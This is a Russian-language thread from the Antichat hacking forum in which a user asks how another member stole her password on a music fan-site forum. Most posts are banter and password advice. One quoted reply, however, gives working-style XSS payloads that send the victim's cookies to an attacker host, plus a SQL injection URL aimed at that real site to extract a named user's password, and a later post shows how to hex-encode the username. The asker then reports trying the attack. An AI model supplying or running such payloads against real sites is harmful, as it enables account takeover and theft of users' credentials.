Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Обьясните пожалуйста как хакер стянул мой пароль (https://forum.antichat.xyz/showthread.php?t=127909)

Katusha 01.07.2009 23:54
Обьясните пожалуйста как хакер стянул мой пароль
 
Здравствуйте! Зарание извините если я пишу не в том разделе!

У меня такой вопрос, на данном форуме один пользователь постоянно ворует чужие пароли. Сегодня он и мой утянул. :( Я совсем не разбераюсь во всех этих штуках, может кто-нибудь мне сможет помочь? Я не прошу хакнуть чужой аккаунт, просто может кто-нибудь сможет обьяснить как хакер это сделал....

KATYA 01.07.2009 23:57
Видишь ли подружка, по видимому у него есть то, чем ты не обладаешь.

POS_troi 01.07.2009 23:58
Уточни

1. Какой пароль ( от чего)
2. Сложность пароля


если пасс от эьтогго же форума то через XSS куки спер. (палить не буду)

2KATYA

Выходи за мну =)

Katusha 02.07.2009 00:09
Цитата:
Сообщение от KATYA
Видишь ли подружка, по видимому у него есть то, чем ты не обладаешь.
Только потому что я не разбераюсь в хакерстве не означает что я дура. И не надо плиз тут крутую из себя строить и обсерать других, я обратилась за помощью.

Katusha 02.07.2009 00:11
Цитата:
Сообщение от POS_troi
Уточни

1. Какой пароль ( от чего)
2. Сложность пароля


если пасс от эьтогго же форума то через XSS куки спер. (палить не буду)

2KATYA

Выходи за мну =)
Пароль от моего аккаунта на форуме. Пароль простой был, просто очень неприятно когда от твоего имени на форуме кто-то пишет всякие гадости. Спасибо что отозвался!

KATYA 02.07.2009 00:13
Видимо у него есть брут, и если пароль простой, только из цифр, то он его сбрутил, а про твои интеллектуальные способности я и не думала говорить :(

Katusha 02.07.2009 00:19
Цитата:
Сообщение от KATYA
Видимо у него есть брут, и если пароль простой, только из цифр, то он его сбрутил, а про твои интеллектуальные способности я и не думала говорить :(
Извини пожалуйста если я тебя не так поняла! Я думала ты имееш в виду "у него есть мозг, а у тебя нет". Сорри! Катюш, а не могла бы ты мне подсказать что такое брут или где об этом можно почитать? Кстати, пароль был только из букв, но дело в том что он ворует пароли у всех.

edit// ааа уже поняла что такое брут, не заметила что на форуме есть такие подсказки

Katusha 02.07.2009 00:28
Цитата:
Сообщение от Strik3r
напиши на титьках GreenBear и выложи сюда фотку
а то мне плохо ясна суть проблеммы :o
Будем считать что написала и выложила...

Проблема: Я бы хотела узнать как один козёл смог украсть пароль от моего аккаунта на http://www.eminem.com/forum/. Вот ссылка на мой аккаунт: http://www.eminem.com/user/default.aspx?mid=5812343

У меня такое ощущение что он просто вводит какой-то код в стоку браузера и ему отображается мой пароль. Но может я говорю ерунду...

POS_troi 02.07.2009 00:28
Цитата:
напиши на титьках GreenBear
А он тут причем?

Цитата:
Пароль простой был, просто очень неприятно когда от твоего имени на форуме кто-то пишет всякие гадости
Катюш не ставь более , простых паролей. лучше запиши в текстовый файлик какую нить краказяблу - типо "JKG*(^(87uy" и используй.

Удачи в освоении азов безопасности, почитай этот форум и многое будет ясно а чем сможем тем и поможем (покрайне мере я)

2Кати

Не ссортесь, когдато все были олухами в этой отрасли.

Strik3r 02.07.2009 00:33
Цитата:
Сообщение от Katusha
Будем считать что написала и выложила...

Проблема: Я бы хотела узнать как один козёл смог украсть пароль от моего аккаунта на http://www.eminem.com/forum/. Вот ссылка на мой аккаунт: http://www.eminem.com/user/default.aspx?mid=5812343

У меня такое ощущение что он просто вводит какой-то код в стоку браузера и ему отображается мой пароль. Но может я говорю ерунду...
Комп проскань на троянцев
потому что брут сейчас не в моде

Цитата:
Сообщение от POS_troi
А он тут причем?
в его подписи приколюху прочитал или в профайле не помню

Katusha 02.07.2009 00:34
Цитата:
Сообщение от POS_troi
Катюш не ставь более , простых паролей. лучше запиши в текстовый файлик какую нить краказяблу - типо "JKG*(^(87uy" и используй.

Удачи в освоении азов безопасности, почитай этот форум и многое будет ясно а чем сможем тем и поможем (покрайне мере я)
Да, спасибо, я уже изменила на более сложный. Но не смогу спокойно спать не узнав как же он всё-таки, извините, п*здит пароли....

Цитата:
Сообщение от POS_troi
2Кати

Не ссортесь, когдато все были олухами в этой отрасли.
Нет нет, это я не так поняла Катю. Моя ошибка. =)

Ch3ck 02.07.2009 00:34
Цитата:
Сообщение от Katusha
У меня такое ощущение что он просто вводит какой-то код в стоку браузера и ему отображается мой пароль.
Так и есть...

Katusha 02.07.2009 00:37
Цитата:
Сообщение от Strik3r
Комп проскань на троянцев
потому что брут сейчас не в моде
Неее троянов у меня точно нету. Это он как-то по другому пароли тянет... :mad:

Katusha 02.07.2009 00:38
Цитата:
Сообщение от Ch3ck
Так и есть...
Эх, если бы ещё узнать что за код он вводит... :rolleyes:

Ребят, может кому что-то похожее попадалось?

Strik3r 02.07.2009 00:42
Цитата:
Сообщение от Katusha
Неее троянов у меня точно нету. Это он как-то по другому пароли тянет... :mad:
я все твои темы почитал, ты постоянно просишь что то взломать :(
а теперь ты увлеклась соц инженерией и нашла хитроумный способ просьбы о взломе. :o
и не говори что я не прав, потому что в 0:42 по Москве у меня открываются телепатические способности :o

Ch3ck 02.07.2009 00:43
Цитата:
Сообщение от Katusha
Эх, если бы ещё узнать что за код он вводит... :rolleyes:

Ребят, может кому что-то похожее попадалось?
http://forum.antichat.ru/nextnewesttothread28451.html

POS_troi 02.07.2009 00:43
Цитата:
извините, п*здит пароли....
Конкретно , вариантов в твоем случае два, но зависит кто именно и в его квалификации.

Брут пароля (в твоем случае вероятная штука июо простой)
и XSS про которую я отписывал админам еще месяц назад (когда встретил подобную жаолобу на зарубежке)

Цитата:
потому что брут сейчас не в моде
конкретно на этом форуме проблем не возникает.

Цитата:
в его подписи приколюху прочитал или в профайле не помню
не видел, извеняюсь.

Цитата:
Так и есть...
+1 ;)

SENIA 02.07.2009 00:43
Цитата:
Сообщение от Strik3r
в 0:42 по Москве у меня открываются телепатические способности :o
+5 :D

Strik3r 02.07.2009 00:44
Цитата:
Сообщение от Katusha
Эх, если бы ещё узнать что за код он вводит... :rolleyes:

Ребят, может кому что-то похожее попадалось?
пока я писал своё предидущее сообщение, ты уже всё подтвердила :D

Katusha 02.07.2009 00:51
Цитата:
Сообщение от Strik3r
я все твои темы почитал, ты постоянно просишь что то взломать :(
а теперь ты увлеклась соц инженерией и нашла хитроумный способ просьбы о взломе. :o
и не говори что я не прав, потому что в 0:42 по Москве у меня открываются телепатические способности :o
Дело в том что я вэб-дизайнер и у меня было давольно много случаев когда люди воровали у меня мои работы и пытались их продать. Это былa простая человеческая месть. Мне было ужасно обидно что я часами корпела над работами а потом какая-та сволоч их украла и еше и продаёт!

А теперь халнули меня и мне конечно интересно узнать как он это сделал.

SENIA 02.07.2009 00:53
Цитата:
Сообщение от Katusha
Дело в том что я вэб-дизайнер и у меня было давольно много случаев когда люди воровали у меня мои работы и пытались их продать. Это былa простая человеческая месть. Мне было ужасно обидно что я часами корпела над работами а потом какая-та сволоч их украла и еше и продаёт!

А теперь халнули меня и мне конечно интересно узнать как он это сделал.
да забей ты на всё это, иди на улицу бахни пивка,легче станет честно ;)

Alexandr II 02.07.2009 00:55
у меня такое ощущение что это реклама... если нет то сорри)
катушка, ты что хочешь стать "хакершой"?)восстанови просто свой аккаут)

Katusha 02.07.2009 01:19
Цитата:
Сообщение от SENIA
да забей ты на всё это, иди на улицу бахни пивка,легче станет честно ;)
Я пиво то не очень люблю.. да у нас тут закрыто всё уже давно.

Katusha 02.07.2009 01:23
Цитата:
Сообщение от Alexandr II
у меня такое ощущение что это реклама... если нет то сорри)
катушка, ты что хочешь стать "хакершой"?)восстанови просто свой аккаут)
Реклама? Чего??? :eek: Нет, ну что ты, какая реклама. :)

А я не то чтобы хочу хакершой стать, просто хотела понять как так можно пароль угнать. Ну да ладно, ответ на вопрос не получила, хотя я понимаю никому не охота заниматься да и сразу так наверное не разберёшся.

Hell En 02.07.2009 13:14
В общем так, либо трояны в твоем компе, либо пасс были 12345, йцукен, qwerty или дата твоего рождения . Сейчас ты наверное поменяла пасс на katusha123 или katusha555 (тоже оооочень сложно) или на чтото связанное с тобой (например фамилию, имя любимой собачки или парня, сорри канеш за приравнивания парней к собачкам)))). Еще вариант ктото безпаливно сломал твое мыло с регой на форум- и теперь периодически шлет себе твои пароли.

Katusha 02.07.2009 14:33
Цитата:
Сообщение от Hell En
В общем так, либо трояны в твоем компе, либо пасс были 12345, йцукен, qwerty или дата твоего рождения . Сейчас ты наверное поменяла пасс на katusha123 или katusha555 (тоже оооочень сложно) или на чтото связанное с тобой (например фамилию, имя любимой собачки или парня, сорри канеш за приравнивания парней к собачкам)))). Еще вариант ктото безпаливно сломал твое мыло с регой на форум- и теперь периодически шлет себе твои пароли.
Представь себе дорогой Хелл что я пароль сменила не на фамилию, имя собачки, кошечки и т.п. Я уже сказала что я вэб-дизайнер и поверь мне я прекрасно понимаю что такое безопасность. Просто я не очень серьёзно отнеслась к тому форуму. И не надо думать что все девушки тупые куклы которые нифига не понимают в компьютерах. Не все такие. А если хочется над кем-то поиздеваться найди себе кого-нибудь другого.

Katusha 02.07.2009 14:35
А сегодня утром я заметила что того придурка с форума забанили. Так что вопрос закрыт. Спасибо тем кто помог советами, а не издёвками!

Katusha 02.07.2009 16:01
Цитата:
Сообщение от Pavlov
1. XSS. Хакер мог внедрить html код при посмотре которого тобою, хареку отправляетсяваш пороль (ну не совесем пароль а cookies, но из них как правило можно извлеч пароль).

Пассивная XSS, вам дают ссылку, или ссылку которая перенаправляет вас на ссылку вида
PHP код:
http://www.eminem.com/forum/default.aspx?cid="><script>img = new Image(); img.src="http://www.hacker-site.ru?"+document.cookie;</script> 
Активная XSS это вставка кода в форму, с плохой отсутвием фильтрации, например вместо картинки вставляют код:
PHP код:
[img]http://www.hacker[url=http://www.hacker-site.ru][url=http://www.hacker-site.ru][/url]onerror:img = new Image(); img.src="http://www.hacker-site.ru?"+document.cookie;[/url]-site.ru/img.png[img] 
2. SQL-Injection. Харкер путём подставления кода в url мог"вытянуть" твой пароль из базы данных форума.
Такой "код" выглидит как правило вот так:
PHP код:
http://www.eminem.com/forum/default.aspx?cid=-1+union+select+select+concat_ws(0x3a,name,password)+db.f_members+wrehe+name=0x4b617475736861
(0x4b617475736861 это аналог 'Katusha'
3. Перебор паролей, думаю понятно.

3. Он телепат :rolleyes:



Если он смог пароли узнать, то уж как бан обойти сможет догадатся :)
Ой, спасибо тебе огромное что разъяснил! Теперь я понимаю как он угнал мой пароль. А как он так смог моё имя в 0x4b617475736861 (ну или подобное) переделать?

Rebz 02.07.2009 16:07
Katusha, 0x4b617475736861 - это Hex
Можно получить так.
http://x3k.ru - En/De Coder.
Вводишь в поле Katusha, ставишь ASCII to Hex, жмёшь на кнопку "En/De Code" и получаешь "4b 61 74 75 73 68 61".
Добавляешь вначале 0x и дописываешь расшифрованный текст без пробелов.

А ещё проще заскриптовать перевод..

Katusha 02.07.2009 16:27
Цитата:
Сообщение от Rebz
Katusha, 0x4b617475736861 - это Hex
Можно получить так.
http://x3k.ru - En/De Coder.
Вводишь в поле Katusha, ставишь ASCII to Hex, жмёшь на кнопку "En/De Code" и получаешь "4b 61 74 75 73 68 61".
Добавляешь вначале 0x и дописываешь расшифрованный текст без пробелов.

А ещё проще заскриптовать перевод..
Спасибо! Попробовала себя "хакнуть", но страничка просто перезагрузилась и ничего. Но всё равно спасибо что открыли глаза! :)

Fristail 02.07.2009 17:14
да нескажи =)
тут такие присутствуют =)
и у знакомых у меня есть такие =)
(но я их баюсь почему-то)

Katusha 02.07.2009 17:15
Не переживайте! В один прекрасный день девушки вам ещё покажут. ;) Как хакнут вас пацанов, потом инфу не восстановите. :p




Щутка


Время: 04:53